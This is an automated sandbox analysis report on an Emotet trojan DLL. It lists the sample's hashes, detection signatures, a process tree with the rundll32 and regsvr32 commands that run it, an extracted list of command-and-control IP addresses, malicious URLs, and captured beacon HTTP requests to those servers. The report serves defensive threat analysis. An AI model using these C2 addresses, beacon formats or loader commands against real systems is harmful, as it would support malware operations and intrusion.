Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
psIFSn7VLi

Overview

General Information

Sample Name:psIFSn7VLi (renamed file extension from none to dll)
Analysis ID:669356
MD5:46c0c3d61c9d7de7b0d8e183217a6cc8
SHA1:ce31a65c73c0728e65d5385731d483f7e9f871c2
SHA256:4533c9dc1c440bf97882358911acf6d3e25ff6b402ca442d752886904f72b786
Tags:32dllexetrojan
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Changes security center settings (notifications, updates, antivirus, firewall)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Modifies existing windows services
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Registers a DLL
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5612 cmdline: loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1356 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2012 cmdline: rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 4864 cmdline: regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 5608 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 4832 cmdline: rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2372 cmdline: rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 4288 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5648 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5764 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5980 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3764 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4656 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6128 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3716 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2344 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6388 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7060 cmdline: c:\windows\system32\svchost.exe -k localservice -s W32Time MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["129.232.188.93:443", "209.250.246.206:443", "138.185.72.26:8080", "119.193.124.41:7080", "103.75.201.2:443", "5.9.116.246:8080", "203.114.109.124:443", "101.50.0.91:8080", "146.59.226.45:443", "216.158.226.206:443", "189.126.111.200:7080", "50.116.54.215:443", "212.24.98.99:8080", "158.69.222.101:443", "151.106.112.196:8080", "176.56.128.118:443", "103.43.46.182:443", "167.99.115.35:8080", "209.126.98.206:8080", "45.142.114.231:8080", "72.15.201.15:8080", "103.75.201.4:443", "207.38.84.195:8080", "51.254.140.238:7080", "212.237.17.99:8080", "45.118.115.99:8080", "110.232.117.186:8080", "188.44.20.25:443", "178.79.147.66:8080", "217.182.25.250:8080", "173.212.193.249:8080", "1.234.21.73:7080", "45.118.135.203:7080", "185.8.212.130:7080", "195.154.133.20:443", "197.242.150.244:8080", "164.68.99.3:8080", "107.182.225.142:8080", "196.218.30.83:443", "1.234.2.232:8080", "82.165.152.127:8080"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.regsvr32.exe.4df0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              2.2.regsvr32.exe.4df0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.4f10000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  3.2.rundll32.exe.4f10000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    6.2.regsvr32.exe.4590000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.446.55.222.11498634432404334 07/20/22-00:21:19.660167
                      SID:2404334
                      Source Port:49863
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.4131.100.24.23149872802404306 07/20/22-00:22:59.973972
                      SID:2404306
                      Source Port:49872
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.451.91.76.894976080802404338 07/20/22-00:19:39.513193
                      SID:2404338
                      Source Port:49760
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: psIFSn7VLi.dllVirustotal: Detection: 63%Perma Link
                      Antivirus detection for URL or domain
                      Source: https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltfAvira URL Cloud: Label: malware
                      Source: https://51.91.7.5/Avira URL Cloud: Label: malware
                      Source: https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQepAvira URL Cloud: Label: malware
                      Source: https://46.55.222.11/TBwKHjQjVeCWIQFSAvira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgbAvira URL Cloud: Label: malware
                      Source: https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlpAvira URL Cloud: Label: malware
                      Source: https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgtyAvira URL Cloud: Label: malware
                      Source: https://120.50.40.183/rosoftAvira URL Cloud: Label: malware
                      Source: https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLStAvira URL Cloud: Label: malware
                      Source: https://103.221.221.247:8080/Avira URL Cloud: Label: malware
                      Source: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawAvira URL Cloud: Label: malware
                      Source: https://192.99.251.50/:Avira URL Cloud: Label: malware
                      Source: https://192.99.251.50/FAvira URL Cloud: Label: malware
                      Source: https://192.99.251.50/Avira URL Cloud: Label: malware
                      Source: https://131.100.24.231/Avira URL Cloud: Label: malware
                      Source: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002Avira URL Cloud: Label: malware
                      Source: https://46.55.222.11/TBwKHjQjVeCWIQFSzAvira URL Cloud: Label: malware
                      Source: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX-Avira URL Cloud: Label: malware
                      Source: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyXAvira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg(Avira URL Cloud: Label: malware
                      Source: https://185.157.82.211/Avira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/nesAvira URL Cloud: Label: malware
                      Source: https://51.91.76.89/Avira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/.Avira URL Cloud: Label: malware
                      Source: https://79.172.212.216/Avira URL Cloud: Label: malware
                      Source: https://46.55.222.11/TBwKHjQjVeCWIQFSiAvira URL Cloud: Label: malware
                      Source: https://206.188.212.92/XAvira URL Cloud: Label: malware
                      Source: https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajEAvira URL Cloud: Label: malware
                      Source: https://120.50.40.183/Avira URL Cloud: Label: malware
                      Source: https://159.8.59.82/Avira URL Cloud: Label: malware
                      Source: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlpAvira URL Cloud: Label: malware
                      Source: https://192.99.251.50/27.42.236/hAvira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/Avira URL Cloud: Label: malware
                      Source: https://46.55.222.11/TBwKHjQjVeCWIQFSNAvira URL Cloud: Label: malware
                      Source: https://103.221.221.247/CertificatesAvira URL Cloud: Label: malware
                      Source: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOaAvira URL Cloud: Label: malware
                      Source: https://206.188.212.92/7Avira URL Cloud: Label: malware
                      Source: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOTAvira URL Cloud: Label: malware
                      Source: https://185.157.82.211:8080/calAvira URL Cloud: Label: malware
                      Source: https://120.50.40.183:80/$v6/Avira URL Cloud: Label: malware
                      Source: https://185.157.82.211:8080/rAvira URL Cloud: Label: malware
                      Source: https://206.188.212.92/Avira URL Cloud: Label: malware
                      Source: https://173.254.208.91/Avira URL Cloud: Label: malware
                      Source: https://160.16.218.63/Avira URL Cloud: Label: malware
                      Source: https://149.56.128.192/Avira URL Cloud: Label: malware
                      Source: https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFBAvira URL Cloud: Label: malware
                      Source: https://103.221.221.247/GlobalAvira URL Cloud: Label: malware
                      Source: https://120.50.40.183:80/zaAvira URL Cloud: Label: malware
                      Source: https://46.55.222.11/Avira URL Cloud: Label: malware
                      Source: https://46.55.222.11/TBwKHjQjVeCWIQFS)Avira URL Cloud: Label: malware
                      Source: https://120.50.40.183/dAvira URL Cloud: Label: malware
                      Source: https://160.16.218.63:8080/5Avira URL Cloud: Label: malware
                      Source: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLErAvira URL Cloud: Label: malware
                      Source: https://103.221.221.247/Avira URL Cloud: Label: malware
                      Source: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEAvira URL Cloud: Label: malware
                      Source: https://120.50.40.183/mAvira URL Cloud: Label: malware
                      Source: https://103.221.221.247:8080/iAvira URL Cloud: Label: malware
                      Source: https://79.172.212.216:8080/Avira URL Cloud: Label: malware
                      Source: https://185.157.82.211:8080/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: https://51.91.7.5/Virustotal: Detection: 16%Perma Link
                      Source: 00000006.00000003.410808194.0000000002BDF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["129.232.188.93:443", "209.250.246.206:443", "138.185.72.26:8080", "119.193.124.41:7080", "103.75.201.2:443", "5.9.116.246:8080", "203.114.109.124:443", "101.50.0.91:8080", "146.59.226.45:443", "216.158.226.206:443", "189.126.111.200:7080", "50.116.54.215:443", "212.24.98.99:8080", "158.69.222.101:443", "151.106.112.196:8080", "176.56.128.118:443", "103.43.46.182:443", "167.99.115.35:8080", "209.126.98.206:8080", "45.142.114.231:8080", "72.15.201.15:8080", "103.75.201.4:443", "207.38.84.195:8080", "51.254.140.238:7080", "212.237.17.99:8080", "45.118.115.99:8080", "110.232.117.186:8080", "188.44.20.25:443", "178.79.147.66:8080", "217.182.25.250:8080", "173.212.193.249:8080", "1.234.21.73:7080", "45.118.135.203:7080", "185.8.212.130:7080", "195.154.133.20:443", "197.242.150.244:8080", "164.68.99.3:8080", "107.182.225.142:8080", "196.218.30.83:443", "1.234.2.232:8080", "82.165.152.127:8080"]}
                      Source: psIFSn7VLi.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                      Source: unknownHTTPS traffic detected: 149.56.128.192:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.4:49863 version: TLS 1.2

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 149.56.128.192 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.157.82.211 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 79.172.212.216 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 131.100.24.231 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.55.222.11 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080
                      Source: C:\Windows\System32\svchost.exeDomain query: time.windows.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 173.254.208.91 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 160.16.218.63 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 206.188.212.92 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 192.99.251.50 443
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.7.5 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 159.8.59.82 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 120.50.40.183 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 58.227.42.236 80
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 103.221.221.247 8080
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49760 -> 51.91.76.89:8080
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.4:49863 -> 46.55.222.11:443
                      Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.4:49872 -> 131.100.24.231:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 129.232.188.93:443
                      Source: Malware configuration extractorIPs: 209.250.246.206:443
                      Source: Malware configuration extractorIPs: 138.185.72.26:8080
                      Source: Malware configuration extractorIPs: 119.193.124.41:7080
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 5.9.116.246:8080
                      Source: Malware configuration extractorIPs: 203.114.109.124:443
                      Source: Malware configuration extractorIPs: 101.50.0.91:8080
                      Source: Malware configuration extractorIPs: 146.59.226.45:443
                      Source: Malware configuration extractorIPs: 216.158.226.206:443
                      Source: Malware configuration extractorIPs: 189.126.111.200:7080
                      Source: Malware configuration extractorIPs: 50.116.54.215:443
                      Source: Malware configuration extractorIPs: 212.24.98.99:8080
                      Source: Malware configuration extractorIPs: 158.69.222.101:443
                      Source: Malware configuration extractorIPs: 151.106.112.196:8080
                      Source: Malware configuration extractorIPs: 176.56.128.118:443
                      Source: Malware configuration extractorIPs: 103.43.46.182:443
                      Source: Malware configuration extractorIPs: 167.99.115.35:8080
                      Source: Malware configuration extractorIPs: 209.126.98.206:8080
                      Source: Malware configuration extractorIPs: 45.142.114.231:8080
                      Source: Malware configuration extractorIPs: 72.15.201.15:8080
                      Source: Malware configuration extractorIPs: 103.75.201.4:443
                      Source: Malware configuration extractorIPs: 207.38.84.195:8080
                      Source: Malware configuration extractorIPs: 51.254.140.238:7080
                      Source: Malware configuration extractorIPs: 212.237.17.99:8080
                      Source: Malware configuration extractorIPs: 45.118.115.99:8080
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 188.44.20.25:443
                      Source: Malware configuration extractorIPs: 178.79.147.66:8080
                      Source: Malware configuration extractorIPs: 217.182.25.250:8080
                      Source: Malware configuration extractorIPs: 173.212.193.249:8080
                      Source: Malware configuration extractorIPs: 1.234.21.73:7080
                      Source: Malware configuration extractorIPs: 45.118.135.203:7080
                      Source: Malware configuration extractorIPs: 185.8.212.130:7080
                      Source: Malware configuration extractorIPs: 195.154.133.20:443
                      Source: Malware configuration extractorIPs: 197.242.150.244:8080
                      Source: Malware configuration extractorIPs: 164.68.99.3:8080
                      Source: Malware configuration extractorIPs: 107.182.225.142:8080
                      Source: Malware configuration extractorIPs: 196.218.30.83:443
                      Source: Malware configuration extractorIPs: 1.234.2.232:8080
                      Source: Malware configuration extractorIPs: 82.165.152.127:8080
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: SZERVERPLEXHU SZERVERPLEXHU
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+bHost: 149.56.128.192Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /TBwKHjQjVeCWIQFS HTTP/1.1Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==Host: 46.55.222.11Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 217.182.25.250 217.182.25.250
                      Source: Joe Sandbox ViewIP Address: 79.172.212.216 79.172.212.216
                      Source: global trafficTCP traffic: 192.168.2.4:49760 -> 51.91.76.89:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49761 -> 173.254.208.91:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49829 -> 160.16.218.63:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49858 -> 206.188.212.92:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49864 -> 79.172.212.216:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49865 -> 103.221.221.247:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49868 -> 185.157.82.211:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49869 -> 159.8.59.82:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49870 -> 51.91.7.5:8080
                      Source: unknownNetwork traffic detected: IP country count 26
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 22:21:19 GMTContent-Type: text/htmlContent-Length: 162Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.254.208.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.254.208.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.254.208.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 149.56.128.192
                      Source: unknownTCP traffic detected without corresponding DNS query: 120.50.40.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 120.50.40.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 120.50.40.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.16.218.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.16.218.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.16.218.63
                      Source: unknownTCP traffic detected without corresponding DNS query: 206.188.212.92
                      Source: unknownTCP traffic detected without corresponding DNS query: 206.188.212.92
                      Source: unknownTCP traffic detected without corresponding DNS query: 206.188.212.92
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.172.212.216
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.172.212.216
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.172.212.216
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.221.221.247
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.221.221.247
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.221.221.247
                      Source: unknownTCP traffic detected without corresponding DNS query: 58.227.42.236
                      Source: unknownTCP traffic detected without corresponding DNS query: 58.227.42.236
                      Source: unknownTCP traffic detected without corresponding DNS query: 58.227.42.236
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.99.251.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.99.251.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.99.251.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.99.251.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.82.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.157.82.211
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
